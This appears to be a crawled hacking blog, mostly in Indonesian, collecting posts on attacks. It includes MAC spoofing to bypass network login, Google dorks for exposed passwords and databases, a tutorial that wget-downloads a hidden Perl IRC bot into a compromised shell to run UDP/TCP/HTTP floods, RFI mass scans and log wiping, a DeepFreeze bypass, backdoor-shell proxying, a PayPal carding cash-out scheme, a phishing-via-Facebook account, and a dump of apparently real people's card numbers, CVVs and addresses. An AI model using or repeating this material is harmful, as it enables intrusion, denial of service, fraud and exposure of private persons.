3.cek lg menggunakan cmd ping –t yahoo.com apakah muncul destination net uncrechable seperti ini



4.cek lagi menggunakan cmd ketik ipconfig /all
5.copykan physical address ke notepad contoh : physical address………… : 00-18-F8-10-A9-FC
6.Buka LAN yang berada di network Connections
7.Klik properties dan pilih configure >> advanced pada bagiam tab pilih network address ha!!
8.setelah sampai langka 7 kita pending dulu dan jalankan tool netcut
9.di bagian tab netcut akan terlihat IP dan mac address masing-masing kompi.itulah yang sebenarnya kita perlukan hihihi <<< sotoy
10.klik prin table


11.Pilihlah IP yang sekiranya tidak diblok oleh admin atau yang sudah login, logikanya alamt IP yang ada di netcut itu sudah login
12.Jd ntuk pemilihan IP sih suka-suka saja, kl di tutor ini memilih ip 192.168.16.101 dengan mac address 00:09:68:76:87:07
13.Copas Mac address kedalam value yg terletak di network Connections >> LAN>>configure >> advanced pada bagiam tab pilih network address.Nah…masukan aja mac address nya di kotak value
14.Jangan lupa untuk menghilangkan tanda (:) ketika mengisikan mac address di kotak value, lalu tekan enter
15.setelah menekan tombol enter akan muncul pesan eror (Eror: packet recive packet failed) abaikan saja
16.Selanjutany tinggal mengganti IP address di computer yang kita pakai.INGAT!! IP address yang digunakan harus menggunakan IP yang td mac addresnya telah kita pakai.Yang kita pakai td adalah mac : 00:09:68:76:87:07 dengan IP : 192.168.16.101
17.Langkah terakhir adalh cek koneksi anda, Have fun browsing

Read More..
Category:   4 Comments
Top Five (5) Best Criminal Computer Hackers of All Time
k4kar0to

1. Kevin Mitnick.
Mitnick is perhaps synonymous with Hacker. The Department of Justice still refers to him as "the most wanted computer criminal in United States history." His accomplishments were memorialized into two Hollywood movies: Takedown and Freedom Downtime.
Mitnick got his start by exploiting the Los Angeles bus punch card system and getting free rides. Then similar to Steve Wozniak, of Apple, Mitnick tried Phone Phreaking. Mitnick was first convicted for hacking into the Digital Equipment Corporation's computer network and stealing software.
Mitnick then embarked on a two and a half year coast to coast hacking spree. He has stated that he hacked into computers, scrambled phone networks, stole corporate secrets and hacked into the national defense warning system. His fall came when he hacked into fellow computer expert and hacker Tsutomu Shimomura's home computer.
Mitnick is now a productive member of society. After serving 5 years and 8 months in solitary confinement, he is now a computer security author, consultant and speaker

2. Adrian Lamo
Lamo hit major organizations hard, hacking into Microsoft and The New York Times. Lamo would use Internet connections at coffee shops, Kinko's and libraries to achieve his feats earning him the nickname "The Homeless Hacker". Lamo frequently found security flaws and exploited them. He would often inform the companies of the flaw.
Lamo's hit list includes Yahoo!, Citigroup, Bank of America and Cingular. Of course White Hat Hackers do this legally because they are hired by the company to such, Lamo however was breaking the law.
Lamo's intrusion into The New York Times intranet placed him squarely into the eyes of the top cyber crime offenders. For this crime, Lamo was ordered to pay $65,000 in restitution. Additionally, he was sentenced to six months home confinement and 2 years probation. Probation expired January of 2007. Lamo now is a notable public speaker and award winning journalist.


3. Jonathan James
At 16 years old, James gained enormous notoriety when he was the first minor to be sent to prison for hacking. He later admitted that he was just having fun and looking around and enjoyed the challenge.
James hit high profile organizations including the Defense Threat Reduction Agency, which is an agency of the Department of the Defense. With this hack he was able to capture usernames and passwords and view highly confidential emails.
High on James list, James also hacked in NASA computers and stole software valued at over $1.7 million. The Justice Department was quoted as saying: "The software stolen by James supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." Upon discovering this hack, NASA had to shut dow its entire computer system costing taxpayers $41,000. Today James aspires to start a computer security company.

4. Robert Tappan Morris
Morris is the son of a former National Security Agency scientist named Robert Morris. Robert is the creator of the Morris worm. This worm was credited as the first computer worm spread through the Internet. Because of his actions, he was the first person to be prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris created the worm while at Cornell as a student claiming that he intended to use the worm to see how large the Internet was at the time. The worm, however, reproduced itself uncontrollably, shutting down many computers until they had completely malfunctioned. Experts claim 6,000 machines were destroyed. Morris was ultimately sentenced to three years' probation, 400 hours of community service and assessed a $10,500 fine.
Morris is now a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. His focus is computer network architecture.

5. Kevin Poulsen
Frequently referred to as Dark Dante, Poulsen gained national recognition for his hack into Los Angeles radio's KIIS-FM phone lines. These actions earned him a Porsche among many other items.
The FBI began to search for Poulson, when he hacked into the FBI database and federal computers for sensitive wiretap information. Poulsen's specialty was hacking into phone lines and he frequently took over all of a station's phone lines. Poulson also reactivated old Yellow Page escort telephone numbers for a partner who operated a virtual escort agency. Poulson was featured on Unsolved Mysteries and then captured in a supermarket. He was assessed a sentence of five years.
Since his time in prison, Poulsen has worked as a journalist and was promoted to senior editor for Wired News. His most popular article details his work on identifying 744 sex offenders with Myspace profiles.

Read More..
Category:   Leave a Comment
Tools Berbahaya Dari Google
k4kar0to

Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.

dari tutorial ini yang akan didapatkan adalah:

* Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
* Bagaimana cara mencari informasi tentang vulnerable systems and Web services
* Bagaimana cara mencari publicly available network devices.


Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contohnya


site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox —> akan mencari kata fox di situs google.com

intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire

inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

allinurl
Sama dengan Allintitle (hanya ini url)

filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

contoh keren: filetype:doc skripsi IT

numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * - + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )

nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……

Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0

“Apache/* Server at” intitle:index.of
–> semua versi dari Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server

“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server

“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server

“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server

Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points

“This summary was generated by wwwstat”
–> web server statistics, system file structure

“These statistics were produced by getstats”
–>web server statistics, system file structure

“This report was generated by WebLog”
–>web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections

intitle:”ASP Stats Generator *.*” “
–>ASP Stats

Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information

intitle:”Multimon UPS status page”
–>UPS device performance statistics

intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information

inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information

inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance

inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs

Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.

“A syntax error has occurred” filetype:ihtml
–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”
–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml
–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”
–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”
–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents

Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google

“http://*:*@www”
site passwords for site, stored as the string

“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords

filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
mdb files, berpotensial untuk mengambil password information

intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords

filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database

intitle:index.of trillian.ini
configuration files for the Trillian IM

eggdrop filetype:user
user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password” configuration files for WV Dial

ext:ini eudora.ini configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information

intext:”powered by Web Wiz Journal”
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/

“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/

intext:”BiTBOARD v2.0? “BiTSHiFTERS Bulletin Board”
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php

Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs

“not for distribution”
confidential documents containing the confidential clause

buddylist.blt
AIM contacts list

intitle:index.of mystuff.xml
Trillian IM contacts list

filetype:ctt “msn”
MSN contacts list

filetype:QDF
QDF database files for the Quicken financial application

intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail

“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net

untuk lebih kreatifnya bisa di

Read More..
Category:   2 Comments
DDOS
k4kar0to

Tutorial Bikin BOT Perl, DDOS dan MASS SCANNING VULN!
Author : Newbee
«-------------------------------------------------------------------------------------»

Oke, Ga usah banyak basa-basi, kalo ngerasa udah hacker gak usah baca nih tulisan. Bagi yang masih newbie kayak saya, langsung aja kamu sedot peralatan di bawah ini :

Peralatan Tempur :
1. File kambe.txt (source bot perl-nya) -->
Code:
http://momupload.com/files/89359/kambe.txt.html

2. File cmd2.txt -->
Code:
http://momupload.com/files/89360/cmd2.txt.html

3. File echo.txt -->
Code:
http://momupload.com/files/89358/echo.txt.html

4. Browser Mozilla Firefox -->
Code:
http://www.mozilla.com/en-US/firefox/

5. Mirc -->
Code:
http://www.mirc.com/get.html

Kalo smuanya sudah siap, sekarang kamu upload FILE CMD2.TXT dan FILE ECHO.TXT ke hostingan kamu. Kalo kamu belom punya hostingan, coba register aja ke hostingan2 gratis sepert http://www.ripway.com, http://www.geocities.com, dan lainnya.

Udah? Beneran?
Kalo 2 file tadi udah sukses dihosting, ambil linknya, misalnya aja linknya http://www.ripway.com/newbee/cmd2.txt dan http://h1.ripway.com/newbee/echo.txt. Dua link ini nanti kamu pakai untuk langkah berikutnya.

Langkah berikutnya? Afaan tuch?
Langkah itu adalah memodifikasi konfigurasi FILE KAMBE.TXT kamu. Coba buka pake program text editor seperti notepad misalnya. Coba kamu perhatikan bagian yang ini :

Image

Ada 7 poin yang kamu edit (yang ada di dalam tanda petik) :

1. Ganti dengan link FILE CMD2.TXT kamu tadi (http://h1.ripway.com/newbee/cmd2.txt)
2. Ganti dengan link FILE ECHO.TXT kamu tadi (http://h1.ripway.com/newbee/echo.txt)
3. Ganti dengan nick kamu di IRC, nick itu nanti yang dianggap sebagai admin bot
4. Ganti dengan nama channel IRC tempat Bot Perl nantinya join.
5. Ganti dengan nick Bot Perl-nya yang kamu mau.
6. Ganti dengan ident dan realname Bot Perl-nya (Gak diganti juga gak apa)
7. Kalo kamu mau Bot Perl-nya masuk server selain ke dalnet, silahkan kamu ganti aja bagian ini dengan nama server IRC yang kamu mau.

Udah keren Nick botnya? Udah gaul? Udah pas semua settingannya?
Cek lagi dech, ntar repot lagi klo ada yang salah.
Kalo bener-bener udah mantaf, langsung disimpan aja filenya, trus lanjut ke langkah berikutnya.

Langkah berikutnya? Afaan tuch?
Langkah itu adalah meng-upload FILE KAMBE.TXT tadi ke hostingan kamu yang tadi udah register. Kalo udah, ambil lagi linknya, misalnya http://h1.ripway.com/newbee/kambe.txt. Persiapkan link tersebut lalu kita meluncur menuju shell.

MANA SHELLNYA???
-_-! Dudul... Kan udah daku bilang tadi minta ama bandar-bandar shell-nya Yogyafree. Tuh adah indounderground, xshadow, inc0mp13te, dll, pada suka bagi-bagi shell gratis tuh mreka.. huehuehe :P :P :P :P :mrgreen:

Udah dapet shellnya?
Kalo udah sekarang cari direktori yang permission-nya 777 di shell.
Caranya eksekusi perintah : find / -type d -perm 777
Kalo uda dapet, baru masuk ke tuh direktori dan jalankan perintah2 ini :

1. Transfer FILE KAMBE.TXT dari hostingan kamu tadi ke dalam shell :
Code:
wget http://h1.ripway.com/newbee/kambe.txt

Kalo wget gak bisa, coba ganti pake lwp-download :
Code:
lwp-download http://h1.ripway.com/newbee/kambe.txt


2. Ubah ekstensi FILE KAMBE.TXT jadi KAMBE.PL biar berekstensi perl dan dihidden biar filenya agak susah ketauan ama admin target. Tanda titik di depan kambe.pl menandakan kalo file tersebut hidden :
Code:
mv kambe.txt .kambe.pl


3. Ganti permission KAMBE.PL jadi 755 biar bisa dieksekusi :
Code:
chmod 755 .kambe.pl


4. Eksekusi file KAMBE.PL :
Code:
perl .kambe.pl


Image

Kalo gak ada pesan error waktu perintah2 di atas dijalankan, berarti pembuatan bot sukses! Tapi klo di IRC tuh bot gak muncul2, berarti IP tuh bot dah diban sama IRC SERVER tersebut, coba aja ganti server IRC di editan KAMBE.TXT tadi dengan server lainnya

Bot-nya dah masuk IRC?
Kalo udah, coba baca-baca dulu perintah-perintah yang ada.
Ketik ini di channel IRC :
Code:
!kambe @help

Bot akan menampilkan help seperti ini :

Image

Nah perintah dengan nama !cmd (prefix-nya) itu smua diganti dengan !kambe, baru bisa jalan (huehuehue).

Oke, Saatnya DDOS!
Langkah-langkahnya :
1. Cari IP target atau Nama Situs target yang mau di DDOS.
2. Ada 3 Metode DDOS pada Bot ini :
- UDP Flood
Syntax Perintahnya : !kambe @udpflood
contohnya : !kambe @udpflood 212.1.3.5 9999999 9999999999999999999

- TCP Flood
Syntax Perintahnya : !kambe @tcpflood
contohnya : !kambe @tcpflood 212.1.3.5 21 9999999 9999999999999999

- HTTP Flood
Syntax Perintahnya : !kambe @httpflood
contohnya : !kambe httpflood http://www.kakus.com 9999999999999999999999

3. Hidupin rokok sambil chatting ngerayu cewe-cewe di IRC. :D

Image


MASS SCAN VULN
Langkah-langkahnya :
1. Cari bug dan dork RFI-nya.
Misalnya aja salah satu exploit RFI di Milw0rm : http://www.milw0rm.com/exploits/5624

Image

- bug : /ch_readalso.php?read_xml_include=
- dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"

2. Jalankan Perintah ini:
Syntax Perintahnya : !kambe @scan
contohnya :
!kambe @scan /ch_readalso.php?read_xml_include= "Copyrights © 2005 Belgische Federale Overheidsdiensten"

3. Hidupin rokok lagi sambil nunggu hasil scan keluar :D , jangan lupa puter lagu kangen band tadi yang udah didownload... biar gak sakit kepala melototin monitor :P

Image

Kalo uda slesai scan2an dan ddos2an-nya dan dah mau pulang, jangan lupa hapus log-nya, caranya ketik :
!kambe @logcleaner

Dan masih banyak lagi fitur bot ini seperti portscan, nmap, back connect, sendmail, dll.

««-=SELESAI=-»»

'Di balik dunia IRC bukan hanya sekedar untuk chatting dan ngejunk... But it could be a dangerous tool'

/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security.
Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini
adalah bukan tanggung jawab saya */

By Newbee a.k.a Kambe
'Im just a single fighter'

Thanks to durhaka for the source

Read More..
Category:   2 Comments
Unfreeze versi 6 ke atas
k4kar0to

Peralatan yg dibutuhin,.
1. USB 512mb (knp pake FD? coz kalo di warnet nda semua PC ada CD-romnya)
2. linux Slax
3. $Persi0.sys

pertama lo format dulu FD lo,.
kalo udah kosong, download nih linux,
http://www.slax.org/get_slax.php?download=tar (190mb)

abis lo donlod,
trus lo Extract file linux yg bru ja lu donlod ke FD lo,
tunggu ampe selesai,.

nah kalo udah selesai,
masuk ke folder Boot yg ada di FD lo,
trus klik Bootinst.bat (ikutin langkah slanjutnya)

kalo udah beres, donlot jg nih file
- http://www.kitaupload.com/download.php? ... Persi0.sys
- http://www.megaupload.com/?d=9BW298L9
- http://jogjaupload.com/index.php?page=d ... Persi0.rar (extract dulu)

pilih aja slh satu link di ats, bwt di donlot,.
trus taro di FD,

kalo semuanya udah beres tinggal restart PC lu dah,
trus boot lwt FD (caranya wktu booting teken aja F8) pilih FD lu,.
oia, nda semua PC bisa pilih'n booting lwt F8, coz tergantung Mobonya,
kalo lwt bios nda tau w pilih yg mana first bootnya,.

kalo udah bisa booting,
ydh tinggal masuk ke linuxnya aja,.

nah kalo udah masuk ke linux tinggal ikutin lngkah" brikut,..

- buka Konsole (commandnya linux)
- ketik mkdir /mnt/baidhowi (enter)
- ketik mount -t ntfs-3g /dev/hda1 /mnt/baidhowi -o force (enter)

tunggu ampe selesai,
/dev/hda1 itu nama driver C windows,
jadi sesuain dulu nama driver C lu di linux apa,..

kalo udah tinggal buka, /dev/hda1 (ini partisi windows driver C)
yg tadi udah di Mount
trus copy n pastein file $Persi0.sys yg td udh di donod,
ke partisi C windows tsb,.

kalo udah tinggal restart linux, trus masuk ke windows kaya biasa,.
kalo udah pencet Shift+Ctrl+alt+F6 buat buka DF trus isi passwordnya
"baidhowi" tanpa tanda kutip

selesai,.

tested DeepFreeze V6.30

Read More..
Category:   2 Comments
Membuat Proxy dengan shell
k4kar0to

Syarat yg harus dalam membuat proxy adalah :

  1. shell
  2. backdor c99/r57
  3. phpproxy_source code (download)
langsung aja ya gausah terlalu banyak basa-basi

Upload source code nya di shell












xtract file phpproxy.zip di commands shell dengan perintah unzip phpproxy.zip

















kemudian arahkan URL yang terdapat file yang tadi anda upload script phpproxy


















Tinggal dicek aja IP kita di checkip.org

Read More..
Category:   Leave a Comment
Teknik money charge
k4kar0to

sedikit tutor aja ya broo....mengenai money charge.Sebenarnya sulit-sulit gampang buat cash out melalui ATM.Aq sendiri aja belum bisa wakakakaka....tp menurut teori gn broo.Sedikit ressep aja ya bukan maksud untuk menggurui.Hal2 yg perlu dilakukan adalah....

  1. siapkan 1 bungkus rokok (untuk menemani anda biar ga tegang :))
  2. kopi sexukupnya biar ga ngantuk soalnya aq dah mulai ngantuk ni,terusin besok aja ya hehehe bcnda pren
  3. bannyak yg harus disiapkan untuk melakukan cashout
  4. shop onlline,kita harus buat shop online sendiri, banyak webhosting yg menyediakan webshop gratis tis..tis.. silahkan cari sendiri di google
  5. cc/ acc paypal yg valid tentunya, tanpa cc paan yg mo di cashout :D
  6. proxy cc/paypal empunya agar dapat di approve
  7. Setelah semua siap termasuk webshop dah jadi kita tinggal lancarkan aksi
  8. oya gw lupa, ketika kita akan cashout disarankan punya 1 id paypal dengan alamat kita sebenarnya dan id paypal dgn alamt palsu
  9. Setelah web yg dibuat jd dan telah di isi dengan brg jualan kita belanja sndr ke web yg kita buat td.
  10. biasanya web shop menggunakan secure dan merchant paypal jadi kita membeli dengan acc paypal orla lain yg kita dapat
  11. web td yg dibuat otomatis akan memasukan saldo kita ke rek paypal palsu yg telah kita buat td
  12. Dari rek paypal palsu td di donasikan ke paypal asli kita
  13. selanjutnya tinggal anda cashout dari paypal asli anda lewat ATM tentunya dengan verifikasi yg tidak mudah pula

Semoga mudah di pahami cmiww............

Read More..
Category:   Leave a Comment
Facebook from the hackers perspective
k4kar0to

For the past few years we've (Netragard) been using internet based Social Networking tools to hack into our customer's IT Infrastructures. This method of attack has been used by hackers since the conception of Social Networking Websites, but only recently has it caught the attention of the media. As a result of this new exposure we've decided to give people a rare glimpse into Facebook from a hackers perspective.

Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest).

Humans have a natural tendency to trust each other. If one human being can provide another human with "something sufficient" then trust is earned. That "something sufficient" can be a face to face meeting but it doesn't always need to be. Roughly 90% of the people that we've targeted and successfully exploited during our social attacks trusted us because they thought we worked for the same company as them.

The setup...

Facebook allows its users to search for other users by keyword. Many facebook users include their place of employment in their profile. Some companies even have facebook groups that only employees or contractors are allowed to become members of. So step one is to perform reconnaissance against those facebook using employees. This can be done with facebook, or with reconnaissance tools like Maltego and pipl.com.

Reconnaissance is the military term for the collection of intelligence about an enemy prior to attacking the enemy. With regards to hacking, reconnaissance can be performed against social targets (facebook, myspace, etc) and technology targets (servers, firewalls, routers, etc). Because our preferred method of attacking employees through facebook is via phishing we normally perform reconnaissance against both vectors.

When setting up for the ideal attack two things are nice to have but only one is required. The first is the discovery of some sort of Cross-site Scripting vulnerability (or something else useful) in our customers website (or one of their servers). The vulnerability is the component that is not required, but is a nice to have (we can set up our own fake server if we need to). The second component is the required component, and that is the discovery of facebook profiles for employees that work for our customer (other social networking sites work just as well).

In one of our recent engagements we performed detailed social and technical reconnaissance. The social reconnaissance enabled us to identify 1402 employees 906 of which used facebook. We didn't read all 906 profiles but we did read around 200 which gave us sufficient information to create a fake employee profile. The technical reconnaissance identified various vulnerabilities one of which was the Cross-site Scripting vulnerability that we usually hope to find. In this case the vulnerability existed in our customer's corporate website.

Cross-site scripting ("XSS") is a kind of computer security vulnerability that is most frequently discovered in websites that do not have sufficient input validation or data validation capabilities. XSS vulnerabilities allow an attacker to inject code into a website that is viewed by other users. This injection can be done sever side by saving the injected code on the server (in a forum, blog, etc) or it can be done client side by injecting the code into a specially crafted URL that can be delivered to a victim.

During our recent engagement we used a client side attack as opposed to a server side attack . We chose the client side attack because it enabled us to select only the users that we are interested in attacking. Server side attacks are not as surgical and usually affect any user who views the compromised server page.

The payload that we created was designed to render a legitimate looking https secured web page that appeared to be a component of our customer's web site. When a victim clicks on the specially crafted link the payload is executed and the fake web page is rendered. In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided. When the users credentials are entered the form submitted them to http://www.netragard.com and were extracted by an automated tool that we created.

After the payload was created and tested we started the process of building an easy to trust facebook profile. Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female. We found a fitting photograph by searching google images and used that photograph for our fake Facebook profile. We also populated the profile with information about our experiences at work by using combined stories that we collected from real employee facebook profiles.

Upon completion we joined our customer's facebook group. Joining wasn't an issue and our request was approved in a matter of hours. Within twenty minutes of being accepted as group members, legitimate customer employees began requesting our friendship. In addition to inbound requests we made hundreds of outbound requests. Our friends list grew very quickly and included managers, executives, secretaries, interns, and even contractors.

After having collected a few hundred friends, we began chatting. Our conversations were based on work related issues that we were able to collect from legitimate employee profiles. After a period of three days of conversing and sharing links, we posted our specially crafted link to our facebook profile. The title of the link was "Omigawd have you seen this I think we got hacked!" Sure enough, people started clicking on the link and verifying their credentials.

Ironically, the first set of credentials that we got belonged to the person that hired us in the first place. We used those credentials to access the web-vpn which in turn gave us access to the network. As it turns out those credentials also allowed us to access the majority of systems on the network including the Active Directory server, the mainframe, pump control systems, the checkpoint firewall console, etc. It was game over, the Facebook hack worked yet again.

During testing we did evaluate the customer's entire infrastructure, but the results of the evaluation have been left out of this post for clarity. We also provided our customer with a solution that was unique to them to counter the Social Network threat. They've since implemented the solution and have reported on 4 other social penetration attempts since early 2008. The threat that Social Networks bring to the table affects every business and the described method of attack has an extraordinarily high success rate.


Read More..
Category:   Leave a Comment
Credit Card
k4kar0to

Info credit card ni akan saya update terus jika saya mendapatkan info cc yang terbaru

Dave Ciepluch
6314 46th Avenue
Kenosha..53142
Wisconsin
United States..262-945-3555
dave.ciepluch@gmail.com
Alvin R Ciepluch
5490995563822961
0609
cvv...900

Rick Rechtien
311 abbey point ct
St louis..63129
Missouri
United States 314-941-5340
rick@gkupr.com
5466160152461990
0809
cvv...367

Meagan Reyes
110 s. stadium apt. R6
Alice...78332
Texas
United States 361-562-3690
mea_mea_04@msn.com
5516978575071009
0509
cvv..099

Derek Freeman
3 Chestnut St.
Laura...45337
Ohio
United States 937-474-0927
ford4x4rangerfx4@yahoo.com
4862367150286427
0811
cvv...740

Brian Ervin
8202 Talbot Cove
Austin....78746
Texas
United States 512-413-5628
prowler-purple@austin.rr.com
4356030061315510
0211
cvv...353

Meridith Weaver
6300 Chestnut Road
Molino...32577
Florida
United States 850-587-5685
mweaver27@frontiernet.net
4966390000008382 0409 031


Mike Jennings
2529 Westminister Dr.
St. Charles....63301
Missouri
United States 636-357-9667
michaelrjennings2@excite.com
4432644013457630 0209 702

Charles Plumlee
2707 bow dr.
copperopolis....95228
California
United States...209 890 5573
tazchaz316@yahoo.com
4239960289428138 0509 756

Enrique Garcia
1239 CYPRESS BEND CIRCLE
Melbourne...32934
Florida
United States 321-7577 912
grt.pty@gmail.com
5445140201079924 0910 021

Jesse Thompson
2213 east 56th ave apt #2
Anchorage...99507
Alaska
United States 8142336150
yellow03srt4@yahoo.com
5438050146037706 0609 022

Robert Sloan
1401K St, NW, Suite M-104
Washington...20005
District of Columbia
United States 202-345-5012
sloanrt@gmail.com
Robert Thomas Sloan
4011804452744323 0510 985

Kathy Conroy
po box 11
Gap...17527
Pennsylvania
United States717-471-2785
picszlynn@gmail.com
5424180714460687 0710 574

salam hangat

K4kar0to

Read More..
Category:   17 Comments
SQL injection Basic Tutorial
k4kar0to

SQL injection Basic Tutorial

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

If you are interested in this topic we have many articles related to SQL Injection also if you would like help with the topic
you can ask in our information security forum where thousands of members can help you.

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question

WHAT I DO :
first let me go into details on how i go about my research
